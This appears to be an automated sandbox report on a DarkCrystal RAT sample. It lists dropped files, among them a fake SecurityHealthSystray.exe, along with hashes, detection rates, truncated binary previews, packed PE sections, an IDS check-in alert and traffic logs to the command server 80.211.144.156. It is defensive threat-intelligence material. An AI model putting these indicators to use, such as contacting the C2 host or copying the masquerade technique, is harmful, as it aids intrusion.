                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 71%
                                    • Antivirus: Virustotal, Detection: 69%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                    C:\Users\user\Desktop\wekqfedd.log

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):85504
                                    Entropy (8bit):5.8769270258874755
                                    Encrypted:false
                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 71%
                                    • Antivirus: Virustotal, Detection: 69%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                    C:\Windows\System32\CSCF64B5552E20A487EA7DE13E15F90A989.TMP

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:MSVC .res
                                    Category:dropped
                                    Size (bytes):1224
                                    Entropy (8bit):4.435108676655666
                                    Encrypted:false
                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                    Malicious:false
                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                    C:\Windows\System32\SecurityHealthSystray.exe

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):4608
                                    Entropy (8bit):3.9755903687939225
                                    Encrypted:false
                                    SSDEEP:48:6JpLPtyM7Jt8Bs3FJsdcV4MKe27VdfJ3ovqBHuOulajfqXSfbNtm:UPxPc+Vx9MZovkIcjRzNt
                                    MD5:0EEC62A56D9CD1EB2DDF39107AD16A82
                                    SHA1:A7EBDCE55F8D56A45D6B90E78D48985724CD5537
                                    SHA-256:E69D42DFC007CD53AC663AE379089B550D4CEDA7D77499AD0A9DF37331EE8D60
                                    SHA-512:666571F7C698CB0AB1D8CB7D3E93A45804F04F29BB8A06B49A355A0F2E3CF9BB6FFED1D8F9587F23C8570763E8328941FCE1112CD052D5D3582EDDA87EF5172C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...jG.f.............................'... ...@....@.. ....................................@.................................l'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..D.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID...$... ...#Blob...........WU........%3................................................................

                                    \Device\Null

                                    Download File
                                    Process:C:\Windows\System32\w32tm.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):151
                                    Entropy (8bit):4.785950200435612
                                    Encrypted:false
                                    SSDEEP:3:VLV993J+miJWEoJ8FX7IFBRP4qNvoU28aNvj:Vx993DEURDP4VU288
                                    MD5:5A6A02F0577429DEB77C06C92EC56E70
                                    SHA1:4D4C5B4DCF91E14DBD905113F7634CD09F125513
                                    SHA-256:F50615D49A55EB2FF22F6C4D6FA78E3AD0E673626731CEBCFD2412F99265BE68
                                    SHA-512:1C4391E5989FED91D6436C719B1090B06C3D97E5D4BB725AB1909481CE316C2DDAB4CA070DF05CFF3B2C061B241842CC1401977BF7BC495D55832C4349302A63
                                    Malicious:false
                                    Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 25/08/2024 11:02:04..11:02:04, error: 0x80072746.11:02:09, error: 0x80072746.

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.75764350497598
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:Internal.exe
                                    File size:3'265'288 bytes
                                    MD5:15e81b6e3999600603d0f8b0dd22c33e
                                    SHA1:8b76e5db4c4344dc6a011310892d026f2ff95906
                                    SHA256:3a809ac2c5f55a839e15387cb84eba8adee8f402fda2736894d797a57b3e2eb1
                                    SHA512:d66610e57ea0138540d414756a8c610e5b38add2dd35f2f1d11cfe1cc5fb320f8a54db4f7a5511cee7187d508c76e62f3e44de17f51fdab0e798dba7202072a4
                                    SSDEEP:98304:FewFpuCoX7qd6lHRQJjZUd4lTpOrGRzHsAgaAYC1AH:copuCoOyHRQJjZUdPrcHsAgaAYC1Q
                                    TLSH:5EE5E11A55918E37C6B0573555E7403D92A0D7323A72EB0B351F60B26803BB6CE72AFB
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                    File Icon

                                    Icon Hash:1f49c6b2b2b05917

                                    Static PE Info

                                    General

                                    Entrypoint:0x41280c
                                    Entrypoint Section:
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:d89f3dcdac0c8dba11dc1162435bedbb

                                    Entrypoint Preview

                                    Instruction
                                    call 00007FACC51907F6h
                                    jmp 00007FACC519060Eh
                                    push 0044BB60h
                                    push dword ptr fs:[00000000h]
                                    mov eax, dword ptr [esp+10h]
                                    mov dword ptr [esp+10h], ebp
                                    lea ebp, dword ptr [esp+10h]
                                    sub esp, eax
                                    push ebx
                                    push esi
                                    push edi
                                    mov eax, dword ptr [00466ECCh]
                                    xor dword ptr [ebp-04h], eax
                                    xor eax, ebp
                                    push eax
                                    mov dword ptr [ebp-18h], esp
                                    push dword ptr [ebp-08h]
                                    mov eax, dword ptr [ebp-04h]
                                    mov dword ptr [ebp-04h], FFFFFFFEh
                                    mov dword ptr [ebp-08h], eax
                                    lea eax, dword ptr [ebp-10h]
                                    mov dword ptr fs:[00000000h], eax
                                    ret
                                    mov ecx, dword ptr [ebp-10h]
                                    mov dword ptr fs:[00000000h], ecx
                                    pop ecx
                                    pop edi
                                    pop edi
                                    pop esi
                                    pop ebx
                                    mov esp, ebp
                                    pop ebp
                                    push ecx
                                    ret
                                    int3
                                    int3
                                    int3
                                    add esp, 04h
                                    jmp 00007FACC5557E3Bh
                                    imul esi, dword ptr [eax], 60h
                                    pop eax
                                    loope 00007FACC5190787h
                                    pushad
                                    sbb al, 47h
                                    xor esp, esi
                                    sub al, 44h
                                    rol byte ptr [ebx+ebx*2+7C8AA5F1h], 1
                                    sar dword ptr [eax+esi*4+63CE1A31h], cl
                                    xor eax, C376D8BFh
                                    iretd
                                    add byte ptr [eax-3976CE8Bh], 0000006Ch
                                    cmpsd
                                    or edx, ecx
                                    mov ch, 7Bh
                                    mov seg?, word ptr [eax-5CD7F545h]
                                    mov esi, 2EF69C51h
                                    mov eax, dword ptr [6B4BA75Bh]
                                    mov eax, dword ptr [916A56B0h]
                                    pop esi
                                    mov cl, 52h
                                    mov cl, B2h
                                    js 00007FACC51907E9h
                                    xor ebp, dword ptr [eax-51h]
                                    push esi
                                    cmp al, 86h
                                    or ah, byte ptr [ebx-3B9FECF2h]
                                    add dword ptr [esi], esp
                                    test dword ptr [edx], ecx

                                    Rich Headers

                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x2f60200x34cheat
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2f60540x210cheat
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000x623c.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2f60000xccheat
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    0x10000x320000x1be00a9b453a74ed788019ab0a332a8e12964False0.997276135089686data7.996505494911121IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0x330000xb0000x4800337e3d781169ec2e8f4b8b188b0f6e86False0.9946831597222222data7.981611898607139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0x3e0000x250000x8001abab95e3f01f489804d55ce1f765049False0.9140625data7.46576892235659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0x630000x10000x200fe5e9b31997ce6e8d69df1a0a87acabdFalse0.451171875data3.7297884374243067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0x640000x90000x2600793558f5393b80d7e873c35081c97c4fFalse0.9827302631578947data7.944368858176558IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0x6d0000x30000x2000a97cfb3eec19321043db03a4f84f9d19False0.95849609375data7.8489874697458575IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x700000x70000x6400c6b070ca22a828adce4bfc8af5b1e330False0.23203125data3.024585906681764IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0x770000x27f0000x2ba00e9b9db4109deec1da109a175be1fab57unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    cheat0x2f60000xe70000xe6a00baaf5a0fd26c880b4cb7a466da2c6fcdFalse0.9969861534552845data7.977472810285237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    PNG0x645240xb45dataEnglishUnited States1.0038128249566725
                                    PNG0x6506c0x15a9dataEnglishUnited States0.970130340333092
                                    RT_ICON0x705240x4538Device independent bitmap graphic, 65 x 130 x 32, image size 16900, resolution 2835 x 2835 px/m0.1881489841986456
                                    RT_DIALOG0x6ab500x286emptyEnglishUnited States0
                                    RT_DIALOG0x6add80x13aemptyEnglishUnited States0
                                    RT_DIALOG0x6af140xecemptyEnglishUnited States0
                                    RT_DIALOG0x6b0000x12eemptyEnglishUnited States0
                                    RT_DIALOG0x6b1300x338emptyEnglishUnited States0
                                    RT_DIALOG0x6b4680x252emptyEnglishUnited States0
                                    RT_STRING0x74a5c0x1e2dataEnglishUnited States0.3900414937759336
                                    RT_STRING0x74c400x1ccdataEnglishUnited States0.4282608695652174
                                    RT_STRING0x74e0c0x1b8dataEnglishUnited States0.45681818181818185
                                    RT_STRING0x74fc40x146dataEnglishUnited States0.5153374233128835
                                    RT_STRING0x7510c0x46cdataEnglishUnited States0.3454063604240283
                                    RT_STRING0x755780x166dataEnglishUnited States0.49162011173184356
                                    RT_STRING0x756e00x152dataEnglishUnited States0.5059171597633136
                                    RT_STRING0x758340x10adataEnglishUnited States0.49624060150375937
                                    RT_STRING0x759400xbcdataEnglishUnited States0.6329787234042553
                                    RT_STRING0x759fc0xd6dataEnglishUnited States0.5747663551401869
                                    RT_GROUP_ICON0x75ad40x14data1.1
                                    RT_MANIFEST0x75ae80x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                    Imports

                                    DLLImport
                                    kernel32.dllGetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
                                    user32.dllMessageBoxA
                                    advapi32.dllRegCloseKey
                                    oleaut32.dllSysFreeString
                                    gdi32.dllCreateFontA
                                    shell32.dllShellExecuteA
                                    version.dllGetFileVersionInfoA
                                    gdiplus.dllGdipAlloc

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                    2024-08-25T15:45:44.649080+0200TCP2048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)14970780192.168.2.880.211.144.156

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Aug 25, 2024 15:45:43.846448898 CEST4970780192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:43.851490021 CEST804970780.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:43.851636887 CEST4970780192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:43.853141069 CEST4970780192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:43.858292103 CEST804970780.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:44.200010061 CEST4970780192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:44.206015110 CEST804970780.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:44.549909115 CEST804970780.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:44.648998022 CEST804970780.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:44.649020910 CEST804970780.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:44.649080038 CEST4970780192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:44.680274963 CEST4970780192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:44.685240030 CEST804970780.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:44.868082047 CEST4970880192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:44.873625994 CEST804970880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:44.873744011 CEST4970880192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:44.873883963 CEST4970880192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:44.878700018 CEST804970880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:44.891242027 CEST804970780.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:44.891619921 CEST4970780192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:44.896542072 CEST804970780.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:45.190363884 CEST804970780.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:45.232837915 CEST4970880192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:45.239240885 CEST804970880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:45.239257097 CEST804970880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:45.239368916 CEST804970880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:45.318973064 CEST4970780192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:45.322191954 CEST4971180192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:45.324417114 CEST804970780.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:45.324505091 CEST4970780192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:45.327136040 CEST804971180.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:45.331286907 CEST4971180192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:45.339277029 CEST4971180192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:45.344096899 CEST804971180.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:45.548530102 CEST804970880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:45.611212015 CEST4970880192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:45.683351994 CEST4971180192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:45.688430071 CEST804971180.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:45.688882113 CEST804971180.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:45.747013092 CEST804970880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:45.792503119 CEST4970880192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:45.972238064 CEST4970880192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:45.974261999 CEST4971280192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:45.977545977 CEST804970880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:45.977597952 CEST4970880192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:45.979123116 CEST804971280.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:45.979183912 CEST4971280192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:45.979459047 CEST4971280192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:45.986371994 CEST804971280.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:46.004705906 CEST804971180.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:46.058118105 CEST4971180192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:46.201056957 CEST804971180.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:46.245616913 CEST4971180192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:46.323940992 CEST4971280192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:46.328993082 CEST804971280.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:46.329010010 CEST804971280.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:46.329021931 CEST804971280.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:46.655853033 CEST804971280.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:46.698765993 CEST4971280192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:46.791594028 CEST804971280.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:46.839467049 CEST4971280192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:47.240328074 CEST4971180192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:47.240464926 CEST4971280192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:47.241204977 CEST4971480192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:47.246130943 CEST804971180.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:47.246231079 CEST4971180192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:47.246629953 CEST804971280.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:47.246752977 CEST4971280192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:47.247175932 CEST804971480.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:47.247483015 CEST4971480192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:47.247595072 CEST4971480192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:47.252918005 CEST804971480.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:47.606041908 CEST4971480192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:47.611150980 CEST804971480.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:47.611166954 CEST804971480.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:47.611177921 CEST804971480.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:47.927711010 CEST804971480.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:48.026962996 CEST4971480192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:48.127664089 CEST804971480.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:48.230022907 CEST4971480192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:48.432434082 CEST4971580192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:48.437500954 CEST804971580.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:48.437580109 CEST4971580192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:48.437699080 CEST4971580192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:48.442521095 CEST804971580.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:48.696454048 CEST4971480192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:48.792576075 CEST4971580192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:48.797643900 CEST804971580.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:48.797663927 CEST804971580.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:48.797673941 CEST804971580.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:49.110965014 CEST804971580.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:49.239625931 CEST804971580.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:49.239691019 CEST4971580192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:49.444807053 CEST4971580192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:49.445611000 CEST4971780192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:49.450421095 CEST804971580.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:49.450598955 CEST4971580192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:49.450675964 CEST804971780.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:49.450737000 CEST4971780192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:49.450839043 CEST4971780192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:49.456727028 CEST804971780.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:49.723160982 CEST4971880192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:49.728236914 CEST804971880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:49.728324890 CEST4971880192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:49.728526115 CEST4971880192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:49.729204893 CEST4971780192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:49.733434916 CEST804971880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:49.775178909 CEST804971780.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:49.918853998 CEST804971780.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:49.918970108 CEST4971780192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:50.006612062 CEST4971980192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:50.011725903 CEST804971980.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:50.011807919 CEST4971980192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:50.013055086 CEST4971980192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:50.017962933 CEST804971980.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:50.093872070 CEST4971880192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:50.098984957 CEST804971880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:50.098999023 CEST804971880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:50.099011898 CEST804971880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:50.099021912 CEST804971880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:50.099086046 CEST4971880192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:50.099102974 CEST4971880192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:50.099102974 CEST804971880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:50.099117994 CEST804971880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:50.099136114 CEST804971880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:50.099145889 CEST804971880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:50.099158049 CEST4971880192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:50.099172115 CEST4971880192.168.2.880.211.144.156
                                    Aug 25, 2024 15:45:50.099179029 CEST804971880.211.144.156192.168.2.8
                                    Aug 25, 2024 15:45:50.099196911 CEST804971880.211.144.156192.168.2.8
